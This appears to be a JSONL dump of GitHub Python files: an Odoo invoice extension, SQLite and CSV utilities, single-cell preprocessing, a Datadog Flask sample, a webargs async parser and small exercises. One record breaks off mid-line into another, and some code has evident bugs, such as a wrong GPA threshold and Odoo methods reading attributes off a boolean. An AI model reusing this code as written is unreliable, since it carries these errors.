resource_version=resource_version, _request_timeout=30) as stream:\n async for event in stream:\n _emit_event(event)\n\n log.error(f\"Monitoring in namespace '{namespace}' stopped unexpectedly\")\n\n\nasync def monitor_forever(crds, namespace):\n while True:\n await monitor(crds, namespace)\n","repo_name":"TrueBrain/OpenTTD-IaC","sub_path":"deployer/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31596828743","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\n\nclass AccountInvoiceAbvo(models.Model):\n _inherit = 'account.invoice'\n\n boat_id = fields.Many2one('res.partner', 'Boat',\n help=\"Use this field when the product is related to a Boat Membership\")\n\n @api.multi\n def write(self, vals):\n '''Change the partner on related membership_line'''\n res = super(AccountInvoiceAbvo, self).write(vals)\n if 'boat_id' in vals or 'partner_id' in vals:\n self.env['membership.membership_line'].search([\n ('account_invoice_line', 'in', self.mapped('invoice_line_ids').ids)\n ]).write({'partner': vals.get('boat_id', res.boat_id)})\n return res\n\n\nclass AccountInvoiceLineAbvo(models.Model):\n _inherit = 'account.invoice.line'\n\n @api.multi\n def write(self, vals):\n MemberLine = self.env['membership.membership_line']\n res = super(AccountInvoiceLineAbvo, self).write(vals)\n if res.invoice_id.boat_id:\n member_lines = MemberLine.search([('account_invoice_line', '=', res.id)])\n member_lines.write({\n 'partner': res.invoice_id.boat_id.id})\n return res\n\n @api.model\n def create(self, vals):\n MemberLine = self.env['membership.membership_line']\n invoice_line = super(AccountInvoiceLineAbvo, self).create(vals)\n if invoice_line.invoice_id.boat_id:\n member_lines = MemberLine.search([('account_invoice_line', '=', invoice_line.id)])\n member_lines.write({\n 'partner': invoice_line.invoice_id.boat_id.id})\n return invoice_line\n","repo_name":"popsolutions/abvo","sub_path":"models/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"39152944589","text":"a, b = 1, 1\n\nfor ex in range(10):\n print (a)\n # list1.append(list1[-1] + list1[-2])\n c = a + b\n a = b\n b = c\n\na = [1, 1, 2, 3, 5,]\na.remove(1)\n\nprint (a)","repo_name":"alfie-machica/testAI","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8218824176","text":"import sqlite3\n#create a connection\nconn = sqlite3.connect('produces.db')\n#create a cursor object\nc = conn.cursor()\n#check\nprint( 'All successful')\n\nstationaries_list= [\n (\"123\", \"pencil\", \"1.50\", \"22\"),\n (\"321\", \"pen\", \"7.50\", \"20\"),\n (\"214\", \"Eraser\", \"2.00\", \"10\"),\n (\"143\", \"Notebook\", \"3.00\", \"12\"),\n (\"412\", \"Ruler\", \"1.50\", \"5\"),\n (\"124\", \"Crimp\", \"0.50\", \"2\"),\n (\"121\", \"Tack\", \"1.20\", \"33\"),\n (\"221\", \"Glue\", \"2.50\", \"1\"),\n (\"1234\", \"stamps\", \"8.50\", \"15\"),\n (\"4321\", \"Drive\", \"6.50\", \"27\"),\n (\"3214\", \"Cord\", \"4.50\", \"3\"),\n (\"3412\", \"Folder\", \"5.00\", \"23\"),\n (\"2135\", \"Paper\", \"10.50\", \"156\"),\n (\"1254\", \"Ipad\", \"30.70\", \"12\"),\n (\"0407\", \"Clip\", \"1.10\", \"37\")\n]\n\nc.executemany( \"\"\" INSERT INTO stationaries VALUES (?, ?, ?, ?) \"\"\", stationaries_list )\n\nc.execute(\"SELECT * FROM stationaries\")\n#check\nprint(\"successful\")\n\n# Calculate the amount the business owner invested in the procurement of the items.\nquery =\"\"\" \n SELECT item_id, SUM (cost_price)\n FROM stationaries;\n \"\"\"\n\nc.execute(query)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem_id \\t total_cost\\n{'-' * 40}\")\nfor item in items:\n item_id, total_cost = item\n print(f\"{item_id}\\t{total_cost}\")\n\n\n#the average quantity of items in stock.\nquery1 = \"\"\"\nSELECT item_id, AVG(quant_in_stock)\nFROM stationaries;\n\"\"\"\n\nc.execute(query1)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem_id\\tquant_in_stock\\n{'-' * 40}\")\nfor item in items:\n item_id, quant_in_stock = item\n print(f\"{item_id}\\t{quant_in_stock}\")\n\n# the item with the least quantity in stock\nquery2= \"\"\" \n SELECT item_id, name, MIN (quant_in_stock)\n FROM stationaries\n \"\"\"\n\nc.execute(query2)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem id \\tname\\tleast item in stock\\n{'-' * 40}\")\nfor item in items:\n item_id, name, quant_in_stock = item\n print(f\"{item_id}\\t {name} \\t {quant_in_stock}\")\n\n\n#the item with the most quantity in stock\nquery3= \"\"\" \n SELECT item_id, name, MAX (quant_in_stock)\n FROM stationaries\n \"\"\"\n\nc.execute(query3)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem id \\tname\\tmost item in stock\\n{'-' * 40}\")\nfor item in items:\n item_id, name, quant_in_stock = item\n print(f\"{item_id}\\t {name} \\t {quant_in_stock}\")\n\n#commit\nconn.commit()\n#close\nconn.close()","repo_name":"AdeAfolabii/SGA_1_3","sub_path":"module5/stationary.py","file_name":"stationary.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24000553832","text":"import re\n\ns = input()\nstr_p = input()\n\np = re.compile(str_p)\nr = p.search(s)\n\nif not r:\n print(\"(-1, -1)\")\n\nwhile r:\n print(\"({start}, {end})\".format(start=r.start(), end=r.end()-1))\n r = p.search(s, r.start()+1)","repo_name":"dydwnsekd/hackerrank","sub_path":"python/Re.start()&Re.end().py","file_name":"Re.start()&Re.end().py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9471403895","text":"\n\n#Programmer: Andrew Engel\n#Date created: 2018/05/14\n#Filename: controller.py\n#Purpose: functions to facilitate communiation to and from the database\n\nimport user\nimport student\nimport faculty\nimport course\nimport db_api\n\ndef createDB():\n db_api.createDB()\n \ndef authenticate(id, pw):\n if id != \"\" or pw != \"\":\n user1 = db_api.authenticate(id, pw)\n return user1 #returns user record from DB\n else:\n return None\n\ndef getStudentData(id):\n if id != \"\":\n data = db_api.getStudentData(id)\n return data\n else:\n return None\n\ndef getFacultyData(id):\n if id != \"\":\n data = db_api.getFacultyData(id)\n return data\n else:\n return None\n\ndef getCourse(id):\n if id == \"\":\n return None\n else:\n return db_api.getCourse(id)\n\ndef getAllCourses():\n courses = db_api.getAllCourses()\n return courses\n\ndef getStudentCourses(studentID):\n if studentID == \"\":\n return None\n else:\n return db_api.getStudentCourses(studentID)\n\ndef numStudentsInCourse(courseid):\n if courseid == \"\":\n return None\n else:\n return db_api.numStudentsInCourse(courseid)\n\ndef enroll(studentid, courseid):\n if studentid == \"\" or courseid == \"\":\n return None\n else:\n db_api.enroll(studentid, courseid)\n\ndef getCourseRecords(userID):\n return db_api.getCourseRecords(userID)\n\ndef getStudentID(userID):\n return db_api.getStudentID(userID)\n\ndef gradeStudent(courseID, facultyID, studentID, grade):\n if courseID == \"\" or facultyID == \"\" or studentID == \"\" or grade == \"\":\n return\n else:\n db_api.gradeStudent(courseID, facultyID, studentID, grade)\n calculateGPA(studentID)\n\ndef isEnrolled(studentID, courseID):\n if studentID == \"\" or courseID == \"\":\n return\n else:\n return db_api.isEnrolled(studentID, courseID)\n\ndef calculateGPA(studentID):\n gpa_dict = {93 : 4.0, 90 : 3.7, 87 : 3.3, 80 : 2.7, 77 : 2.3, 73 : 2.0, 70 : 1.7, 76 : 1.3, 65 : 1.0, 0 : 0.0 }\n grades = getStudentGrades(studentID)\n\n #determine gpa for each course and add to courseGPAs list\n courseGPAs = []\n for grade in grades:\n g = grade[0]\n for key in sorted(gpa_dict.keys(), reverse = True):\n if g >= key:\n courseGPAs.append(gpa_dict[key])\n break\n #sum courseGPAs together and divide by number of courseGPAs\n sumGPA = 0.0\n for course_gpa in courseGPAs:\n sumGPA += course_gpa\n #validate non-zero divisor and calculate GPA\n gpa = 0.0\n if sumGPA > 0.0:\n gpa = sumGPA / len(courseGPAs)\n #update GPA in student table\n db_api.updateStudentGPA(studentID, gpa)\n return gpa\n\n\ndef getStudentGrades(studentID):\n return db_api.getStudentGrades(studentID)\n\n#**************TESTING FUNCTIONS***************\n\ndef getAllStudentRecords():\n return db_api.getAllStudentRecords()\n\ndef getAllCourseRecords():\n return db_api.getAllCourseRecords()","repo_name":"androidengel/college-records","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35048171328","text":"''' Heapq이용 자료구조에서 힙 찾아보깅'''\nfrom heapq import *\n\ndef solution(scoville, K):\n heapify(scoville)\n count=0\n while(scoville[0] Table:\n new_data = data.copy()\n\n if self.base == LogarithmicScale.BinaryLog:\n def func(x, *args, **kwargs):\n return np.log2(x + 1, *args, **kwargs)\n elif self.base == LogarithmicScale.CommonLog:\n def func(x, *args, **kwargs):\n return np.log10(x + 1, *args, **kwargs)\n elif self.base == LogarithmicScale.NaturalLog:\n func = np.log1p\n\n if sp.issparse(new_data.X):\n func(new_data.X.data, out=new_data.X.data)\n else:\n func(new_data.X, out=new_data.X)\n\n return new_data\n\n\nclass Binarize(Preprocess):\n Condition = Enum(\"Binarize\", (\"GreaterOrEqual\", \"Greater\"),\n qualname=\"Binarize.Condition\")\n GreaterOrEqual, Greater = Condition\n\n def __init__(self, condition=GreaterOrEqual, threshold=1):\n self.condition = condition\n self.threshold = threshold\n\n def __call__(self, data: Table) -> Table:\n new_data = data.copy()\n with new_data.unlocked_reference(new_data.X):\n if self.condition == Binarize.GreaterOrEqual:\n new_data.X = new_data.X >= self.threshold\n elif self.condition == Binarize.Greater:\n new_data.X = new_data.X > self.threshold\n return new_data\n\n\nclass Normalize(Preprocess):\n Method = Enum(\"Normalize\", (\"CPM\", \"Median\", \"CP10K\"), qualname=\"Normalize.Method\")\n CPM, Median, CP10K = Method\n\n def __init__(self, method=CPM):\n self.method = method\n\n def __call__(self, *args):\n raise NotImplementedError\n\n def normalize(self, *args):\n raise NotImplementedError\n\n\nclass NormalizeSamples(Normalize):\n def __call__(self, data: Table) -> Table:\n new_data = data.copy()\n with new_data.unlocked_reference(new_data.X):\n new_data.X = self.normalize(data.X)\n return new_data\n\n def normalize(self, table: AnyArray) -> AnyArray:\n row_sums = ut.nansum(table, axis=1)\n row_sums[row_sums == 0] = 1 # avoid division by zero errors\n\n if self.method == NormalizeSamples.Median:\n factor = np.nanmedian(row_sums)\n \n elif self.method == NormalizeSamples.CP10K:\n factor = 1e4\n else:\n factor = 1e6\n\n if sp.issparse(table):\n table = sp.diags(1 / row_sums) @ table\n else:\n table = table / row_sums[:, None]\n\n table *= factor\n\n return table\n\n\nclass NormalizeGroups(Normalize):\n def __init__(self, group_var, method=Normalize.CPM):\n super().__init__(method)\n self.group_var = group_var\n\n def __call__(self, data: Table) -> Table:\n group_col = data.get_column(self.group_var)\n group_col = group_col.astype(\"int64\")\n new_data = data.copy()\n with new_data.unlocked_reference(new_data.X):\n new_data.X = self.normalize(data.X, group_col)\n return new_data\n\n def normalize(self, table: AnyArray, group_col: np.ndarray) -> AnyArray:\n group_sums = np.bincount(group_col, ut.nansum(table, axis=1))\n group_sums[group_sums == 0] = 1\n group_sums_row = np.zeros_like(group_col)\n medians = []\n row_sums = ut.nansum(table, axis=1)\n for value, group_sum in zip(np.unique(group_col), group_sums):\n mask = group_col == value\n group_sums_row[mask] = group_sum\n if self.method == NormalizeGroups.Median:\n medians.append(np.nanmedian(row_sums[mask]))\n\n if self.method == NormalizeGroups.Median:\n factor = np.min(medians)\n else:\n factor = 1e6\n\n if sp.issparse(table):\n table = sp.diags(1 / group_sums_row) @ table\n else:\n table = table / group_sums_row[:, None]\n\n table *= factor\n\n return table\n\n\nclass Standardize(Preprocess):\n def __init__(self, lower_bound=None, upper_bound=None):\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n\n def __call__(self, data):\n new_data = data.copy()\n with np.errstate(invalid=\"ignore\"):\n with new_data.unlocked_reference(new_data.X):\n new_data.X = np.nan_to_num(zscore(data.X))\n if self.lower_bound is not None or self.upper_bound is not None:\n with new_data.unlocked(new_data.X):\n np.clip(new_data.X, self.lower_bound, self.upper_bound, new_data.X)\n return new_data\n\n\nclass SelectMostVariableGenes(Preprocess):\n Method = Enum(\"SelectMostVariableGenes\",\n (\"Dispersion\", \"Variance\", \"Mean\"),\n qualname=\"SelectMostVariableGenes.Method\")\n Dispersion, Variance, Mean = Method\n\n def __init__(self, method=Dispersion, n_genes=1000, n_groups=20):\n self.method = method\n self.n_genes = n_genes\n self.n_groups = n_groups if n_groups and n_groups > 1 else 1\n\n def __call__(self, data: Table) -> Table:\n n_groups = min(self.n_groups, len(data.domain.attributes))\n mean = ut.nanmean(data.X, axis=0)\n variance = ut.nanvar(data.X, axis=0)\n percentiles = [percentileofscore(mean, m) for m in mean]\n _, bins = np.histogram(percentiles, n_groups)\n bin_indices = np.digitize(percentiles, bins, True)\n # Right limit is treated differently in histogram and digitize\n # See https://github.com/numpy/numpy/issues/4217\n bin_indices[bin_indices == 0] = 1\n\n zscores = np.zeros_like(mean)\n for group in range(n_groups):\n group_indices, = np.where(bin_indices == group + 1)\n if self.method == SelectMostVariableGenes.Dispersion:\n group_mean = mean[group_indices]\n group_scores = np.divide(\n variance[group_indices], group_mean,\n out=np.zeros_like(group_mean), where=group_mean != 0\n )\n elif self.method == SelectMostVariableGenes.Variance:\n group_scores = variance[group_indices]\n elif self.method == SelectMostVariableGenes.Mean:\n group_scores = mean[group_indices]\n\n with np.errstate(invalid=\"ignore\"):\n zscores[group_indices] = zscore(group_scores)\n\n indices = np.argsort(np.nan_to_num(zscores))[-self.n_genes:]\n return self._filter_columns(data, indices)\n\n @staticmethod\n def _filter_columns(data, indices):\n indices = sorted(indices)\n domain = data.domain\n attrs, cls, metas = domain.attributes, domain.class_vars, domain.metas\n domain = Domain(tuple(np.array(attrs)[indices]), cls, metas)\n return data.transform(domain)\n\n\nclass DropoutWarning(Warning):\n pass\n\n\nclass DropoutGeneSelection(Preprocess):\n def __init__(self, n_genes=None, decay=1, x_offset=5, y_offset=0.02,\n threshold=0, at_least=0):\n self.n_genes = n_genes\n self.x_offset = x_offset\n self.y_offset = y_offset\n self.decay = decay\n self.threshold = threshold\n self.at_least = at_least\n\n def __call__(self, data: Table) -> Table:\n zero_rate, mean_expr = self.detection(data.X)\n selected = self.select_genes(zero_rate, mean_expr)\n if sum(selected) < self.n_genes:\n warnings.warn(f\"{sum(selected)} genes selected\", DropoutWarning)\n return self.filter_columns(data, selected)\n\n def detection(self, table: AnyArray) -> Tuple[np.ndarray, np.ndarray]:\n with np.errstate(invalid=\"ignore\"): # comparison can include nans\n mask = table > self.threshold\n\n if sp.issparse(table):\n A = table.copy()\n np.log2(A.data, out=A.data)\n else:\n A = np.ma.log2(table) # avoid log2(0)\n A.mask = False\n\n detection_rate = ut.nanmean(mask, axis=0)\n zero_rate = 1 - detection_rate\n detected = detection_rate > 0\n detected_mean = ut.nanmean(A[:, detected], axis=0)\n\n mean_expr = np.full_like(zero_rate, fill_value=np.nan)\n mean_expr[detected] = detected_mean / detection_rate[detected]\n\n low_detection = np.array(np.sum(mask, axis=0)).squeeze()\n zero_rate[low_detection < self.at_least] = np.nan\n mean_expr[low_detection < self.at_least] = np.nan\n return zero_rate, mean_expr\n\n def select_genes(self, zero_rate: np.ndarray,\n mean_expr: np.ndarray) -> np.ndarray:\n args = (mean_expr, zero_rate)\n return self.__get_selected(*args) if self.n_genes is None \\\n else self.__bisection(*args)\n\n def __bisection(self, mean_expr, zero_rate):\n low, up = 0, 10\n for t in range(100):\n selected = self.__get_selected(mean_expr, zero_rate)\n if np.sum(selected) == self.n_genes:\n break\n elif np.sum(selected) < self.n_genes:\n up = self.x_offset\n self.x_offset = (self.x_offset + low) / 2\n else:\n low = self.x_offset\n self.x_offset = (self.x_offset + up) / 2\n return selected\n\n def __get_selected(self, mean_expr, zero_rate):\n nonan = ~np.isnan(zero_rate)\n sel = np.zeros_like(zero_rate).astype(bool)\n x = mean_expr[nonan]\n y = self.y(x, self.decay, self.x_offset, self.y_offset)\n sel[nonan] = (zero_rate[nonan] > y)\n return sel\n\n @staticmethod\n def y(x, decay, x_offset, y_offset):\n return np.exp(-decay * (x - x_offset)) + y_offset\n\n @staticmethod\n def filter_columns(data: Table, mask: np.ndarray) -> Table:\n domain = data.domain\n return data.transform(Domain(tuple(np.array(domain.attributes)[mask]),\n domain.class_vars, domain.metas))\n","repo_name":"biolab/orange3-single-cell","sub_path":"orangecontrib/single_cell/preprocess/scpreprocess.py","file_name":"scpreprocess.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"99"} +{"seq_id":"23153483638","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencodings=utf-8\n\nimport os\nimport re\nimport sys\nimport csv\nimport ast\nimport json\nimport argparse\nimport calendar\nfrom types import *\nfrom datetime import datetime\n\nclass NotSupportedError(NotImplementedError):\n pass\n\nclass InputConverter(object):\n\n def __init__(self):\n self.impl_map = {\n 'short' : int,\n 'int' : int,\n 'integer' : int,\n 'long' : long,\n 'float' : float,\n 'double' : float,\n 'string' : self.convert_string,\n 'timestamp' : long,\n 'array' : self.convert_array,\n 'boolean' : bool\n }\n\n def get_impl(self, name):\n impl = self.impl_map.get(name)\n if not impl:\n raise NotSupportedError('\"{}\" is not a supported type'.format(name))\n return impl\n\n def convert_string(self, value):\n return value.decode('utf-8')\n\n def convert_array(self, value):\n return self.convert_string(value).split(u',')\n\n\ndef convert(infile, outfile, columns, delimiter='|', quotechar='\"'):\n \"\"\"\n Convert infile (stdin) formatted as csv (with column headers)\n to outfile (stdout) formatted as json\n \"\"\"\n\n converter = InputConverter()\n cols = [col.split(':') for col in columns]\n function_seq = [(c[0], converter.get_impl(c[1])) for c in cols]\n\n reader = csv.DictReader(infile, [c[0] for c in cols],\n delimiter=delimiter, quotechar=quotechar)\n for row in reader:\n for k, impl in function_seq:\n if row[k] == '\\\\N':\n row[k] = None # NULL -> None\n else:\n row[k] = impl(row[k])\n outfile.write(json.dumps(row))\n outfile.write('\\n')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Convert MySQL csv to Crate JSON')\n parser.add_argument('infile', nargs='?',\n type=argparse.FileType('r'),\n help='path to csv file',\n default=sys.stdin)\n parser.add_argument('outfile', nargs='?',\n type=argparse.FileType('w'),\n help='path to json file',\n default=sys.stdout)\n parser.add_argument('--columns', nargs='*',\n help=\"\"\"column definition formatted as col_name:col_type [...]\n column types are: short, int, integer, long, float, double, string, timestamp, array\"\"\")\n args = parser.parse_args()\n convert(args.infile, args.outfile, args.columns)\n","repo_name":"realxujiang/labs","sub_path":"common/code/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"99"} +{"seq_id":"7005265690","text":"#-*- coding: UTF-8 -*-\r\nimport apiutil\r\nimport json\r\n\r\napp_key = 'xxx'\r\napp_id = 'xxx'\r\n\r\nif __name__ == '__main__':\r\n str_question = '你好吗?'\r\n ai_obj = apiutil.AiPlat(app_id, app_key)\r\n\r\n print('----------------------SEND REQ----------------------')\r\n rsp = ai_obj.getNlpTextchat(str_question)\r\n if rsp['ret'] == 0:\r\n print(rsp['data']['answer'])\r\n print('----------------------API SUCC----------------------')\r\n else:\r\n print(json.dumps(rsp, ensure_ascii=False, sort_keys=False, indent=4))\r\n print('----------------------API FAIL----------------------')\r\n\r\n","repo_name":"PengJenas/tx-ai","sub_path":"demo/test_nlp_textchat.py","file_name":"test_nlp_textchat.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17347831513","text":"from flask import Flask\nfrom datadog import statsd\nimport logging\n\nimport os\n\n# This is a small example application\n# It uses tracing and dogstatsd on a sample flask application\n\nlog = logging.getLogger(\"app\")\n\napp = Flask(__name__)\n\n# The app has two routes, a basic endpoint and an exception endpoint\n@app.route(\"/\")\ndef hello():\n statsd.increment('request.number', 1, tags=[\"test\", \"foo:bar\", \"my:app\"])\n log.info(\"Got a request at hello\")\n return \"Hello World!\"\n\n@app.route(\"/error\")\ndef error():\n statsd.increment('request.error.number', 1, tags=[\"test\", \"foo:bar\", \"my:app\"])\n log.info(\"Got a request at error\")\n raise Exception()\n\n# This is meant to be run directly, instead of executed through flask run\nif __name__ == '__main__':\n # It grabs the host and port from the environment\n port = 5001\n host = '0.0.0.0'\n if os.environ.get('HOST'):\n host = os.environ.get('HOST')\n if os.environ.get('PORT'):\n port = os.environ.get('PORT')\n app.run(debug=True, host=host, port=port)\n","repo_name":"DataDog/datadog-cloudfoundry-buildpack","sub_path":"docker/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"99"} +{"seq_id":"8463283349","text":"# https://www.acmicpc.net/problem/11650\n# 좌표 정렬하기.py\n\ncoordinate = []\nn = int(input())\nfor i in range(n):\n coordinate.append(list(map(int,input().split())))\ncoordinate.sort(key=lambda x : (x[0], x[1]))\nfor x in coordinate:\n print(x[0],x[1]) ","repo_name":"cokemania2/workspace","sub_path":"codingTest/백준/좌표 정렬하기.py","file_name":"좌표 정렬하기.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32170336764","text":"import requests\n# s_city = \"Petersburg,RU\"\nappid = \"ee5d55c03e00461d6c01b4e1b991bc40\"\n# city_id for SPb\ncity_id = 498817\n\n\n# Прогноз\ndef request_forecast(city_id):\n try:\n res = requests.get(\"http://api.openweathermap.org/data/2.5/forecast\",\n params={'id': city_id, 'units': 'metric', 'lang': 'ru', 'APPID': appid})\n data = res.json()\n print('city:', data['city']['name'], data['city']['country'])\n sum = 0\n count = 0\n a = []\n morns_six = []\n morns_nine = []\n for i in data['list']:\n if i['dt_txt'].find('06:00:00') != -1:\n morns_six.append(i['main']['temp'])\n if i['dt_txt'].find('09:00:00') != -1:\n morns_nine.append(i['main']['temp'])\n sum += i['main']['temp']\n count += 1\n except Exception as e:\n print(\"Exception (forecast):\", e)\n pass\n\n print(\"Средняя температура = \", format(round(sum/count, 2)))\n print('Максимальная прогнозная утренняя (6-и утра) температура = ', max(morns_six))\n print('Максимальная прогнозная утренняя (9-и утра) температура = ', max(morns_nine))\n\n\nrequest_forecast(city_id)\n","repo_name":"Tcheburatz0/Weather_forecast","sub_path":"AVAR_testing.py","file_name":"AVAR_testing.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42582011284","text":"#!/usr/bin/python3\n\"\"\"\nThis is the \"Square\" module.\n\nThis module provides a simple Square class with initialize size.\n\"\"\"\n\n\nclass Square:\n \"\"\"A class that defines a square by size, which defaults 0.\n Also defines position using a tuple, which defaults (0, 0).\n Square can also get area, and print square using '#'.\n When printing, using position, offset on top and left.\n \"\"\"\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"This is the __init__ method\"\"\"\n self.position = position\n self.size = size\n\n @property\n def size(self):\n \"\"\"This is a public instance method\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n self.value = value\n if type(value) is not int:\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n\n @property\n def position(self):\n \"\"\"This is a public instance method\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"This is a public instance method\"\"\"\n if \\\n type(value) is not tuple or \\\n len(value) != 2 or type(value[0]) is not int or \\\n type(value[1]) is not int or value[0] < 0 or value[1] < 0:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n \"\"\"This is a public instance method\"\"\"\n return self.__size * self.__size\n\n def my_print(self):\n \"\"\"Print a square method\"\"\"\n if self.__size is 0:\n print(\"\")\n else:\n if self.__position[1] is not 0:\n print(\"\\n\" * self.__position[1], end='')\n for i in range(self.__size):\n print(\" \" * self.__position[0], end='')\n print(\"#\" * self.__size)\n","repo_name":"hug0-cstrs/holbertonschool-higher_level_programming","sub_path":"python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27746386979","text":"import csv\n\n# open the two CSV files to be merged\nwith open('Employee_Clean_ScannedData.csv', 'r') as file1, open('Tool_Clean_ScannedData.csv', 'r') as file2:\n\n # create a reader object for each file\n reader1 = csv.reader(file1)\n reader2 = csv.reader(file2)\n\n # create a new CSV file for the merged data\n with open('merged_file.csv', 'w', newline='') as merged_file:\n\n # create a writer object for the new file with 9 columns\n writer = csv.writer(merged_file, delimiter=',')\n\n # loop through the rows of both files simultaneously and write them to the new file with 9 columns\n for row1, row2 in zip(reader1, reader2):\n writer.writerow(row1 + row2)\n","repo_name":"HamniZeen/Digitizing-Equipment-Management-System-for-Aviation-Industry-in-Sri-Lanka","sub_path":"combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23044024875","text":"# -*- coding: utf-8 -*-\n\"\"\"Asynchronous request parser. Compatible with Python>=3.4.\"\"\"\nimport asyncio\nimport collections\nimport inspect\nimport functools\n\nimport marshmallow as ma\nfrom marshmallow.compat import iteritems\nfrom marshmallow.utils import missing\n\nfrom webargs import core\n\nclass AsyncParser(core.Parser):\n \"\"\"Asynchronous variant of `webargs.core.Parser`, where parsing methods may be\n either coroutines or regular methods.\n \"\"\"\n\n @asyncio.coroutine\n def _parse_request(self, schema, req, locations):\n if schema.many:\n assert 'json' in locations, 'schema.many=True is only supported for JSON location'\n # The ad hoc Nested field is more like a workaround or a helper, and it servers its\n # purpose fine. However, if somebody has a desire to re-design the support of\n # bulk-type arguments, go ahead.\n parsed = yield from self.parse_arg(\n name='json',\n field=ma.fields.Nested(schema, many=True),\n req=req,\n locations=locations\n )\n if parsed is missing:\n parsed = []\n else:\n argdict = schema.fields\n parsed = {}\n for argname, field_obj in iteritems(argdict):\n parsed_value = yield from self.parse_arg(argname, field_obj, req, locations)\n # If load_from is specified on the field, try to parse from that key\n if parsed_value is missing and field_obj.load_from:\n parsed_value = yield from self.parse_arg(field_obj.load_from,\n field_obj, req, locations)\n argname = field_obj.load_from\n if parsed_value is not missing:\n parsed[argname] = parsed_value\n return parsed\n\n # TODO: Lots of duplication from core.Parser here. Rethink.\n @asyncio.coroutine\n def parse(self, argmap, req=None, locations=None, validate=None, force_all=False):\n \"\"\"Coroutine variant of `webargs.core.Parser`.\n\n Receives the same arguments as `webargs.core.Parser.parse`.\n \"\"\"\n req = req if req is not None else self.get_default_request()\n assert req is not None, 'Must pass req object'\n ret = None\n validators = core._ensure_list_of_callables(validate)\n schema = self._get_schema(argmap, req)\n try:\n parsed = yield from self._parse_request(schema=schema, req=req, locations=locations)\n result = self.load(parsed, schema)\n self._validate_arguments(result.data, validators)\n except ma.exceptions.ValidationError as error:\n self._on_validation_error(error)\n else:\n ret = result.data\n finally:\n self.clear_cache()\n if force_all:\n core.fill_in_missing_args(ret, argmap)\n return ret\n\n def use_args(self, argmap, req=None, locations=None, as_kwargs=False, validate=None):\n \"\"\"Decorator that injects parsed arguments into a view function or method.\n\n .. warning::\n This will not work with `async def` coroutines. Either use a generator-based\n coroutine decorated with `asyncio.coroutine` or use the\n `parse ` method.\n\n Receives the same arguments as `webargs.core.Parser.use_args`.\n \"\"\"\n locations = locations or self.locations\n request_obj = req\n # Optimization: If argmap is passed as a dictionary, we only need\n # to generate a Schema once\n if isinstance(argmap, collections.Mapping):\n argmap = core.argmap2schema(argmap)()\n\n def decorator(func):\n req_ = request_obj\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n req_obj = req_\n\n # if as_kwargs is passed, must include all args\n force_all = as_kwargs\n\n if not req_obj:\n req_obj = self.get_request_from_view_args(func, args, kwargs)\n # NOTE: At this point, argmap may be a Schema, callable, or dict\n parsed_args = yield from self.parse(argmap,\n req=req_obj, locations=locations,\n validate=validate, force_all=force_all)\n if as_kwargs:\n kwargs.update(parsed_args)\n return func(*args, **kwargs)\n else:\n # Add parsed_args after other positional arguments\n new_args = args + (parsed_args, )\n return func(*new_args, **kwargs)\n wrapper.__wrapped__ = func\n return wrapper\n return decorator\n\n def use_kwargs(self, *args, **kwargs):\n \"\"\"Decorator that injects parsed arguments into a view function or method.\n\n .. warning::\n This will not work with `async def` coroutines. Either use a generator-based\n coroutine decorated with `asyncio.coroutine` or use the\n `parse ` method.\n\n Receives the same arguments as `webargs.core.Parser.use_kwargs`.\n\n \"\"\"\n return super().use_kwargs(*args, **kwargs)\n\n @asyncio.coroutine\n def parse_arg(self, name, field, req, locations=None):\n location = field.metadata.get('location')\n if location:\n locations_to_check = self._validated_locations([location])\n else:\n 